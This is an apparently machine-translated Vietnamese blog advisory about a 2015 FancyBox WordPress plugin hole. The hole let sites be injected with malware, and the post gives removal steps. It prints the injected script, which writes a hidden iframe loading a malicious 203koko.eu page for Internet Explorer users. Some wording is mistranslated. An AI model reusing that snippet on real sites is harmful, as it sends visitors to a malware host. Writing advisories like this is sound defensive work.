Đầu tuần này, một số trang web và blog WordPress, đã nhận được cảnh báo từ nhiễm phần mềm độc hại xuyên qua Google Webmaster.
Vấn đề mà Google Webmaster gọi là sự hiện diện của một cá tuyết / kịch bản phần mềm độc hại iframe các trang web mã nguồn.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>Dường như đó là một dễ bị tổn thương a Pluginacquis FancyBox cho WordPress mà cho đến ngày hôm qua (05.02.2015) đã không được cập nhật trong một thời gian dài.
Giải quyết vấn đề này và khử trùng virus trang web với phần mềm độc hại này, tương đối đơn giản.
1. Tắt plugin FancyBox.
2. Xóa tất cả các tệp plugin FancyBox khỏi máy chủ (qua FTP)
3. Cài đặt phiên bản mới của plugin (Fancybox 3.0.4)
FancyBox cho WordPress 3.0.4
- Đã đổi tên cài đặt bị ảnh hưởng bởi vấn đề bảo mật được đề cập trong 3.0.3. Điều này sẽ ngăn không cho mã độc xuất hiện trên các trang web có plugin updated mà không cần gỡ bỏ mã độc.
FancyBox cho WordPress 3.0.3
– Cố định một vấn đề an ninh.
Thông tin phần mềm độc hại:
TYPE: Iframe chuyển hướng
TARGET: WordPress Hộp vui vẻ
DOMAIN MALWARE: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
PHẦN MỀM RAW MÃ SỐ:
PHẦN MỀM VIẾT: if (navigator.userAgent.match(/msie/i)) { document.write(‘
Xóa phần mềm độc hại khỏi WordPress trang mạng.
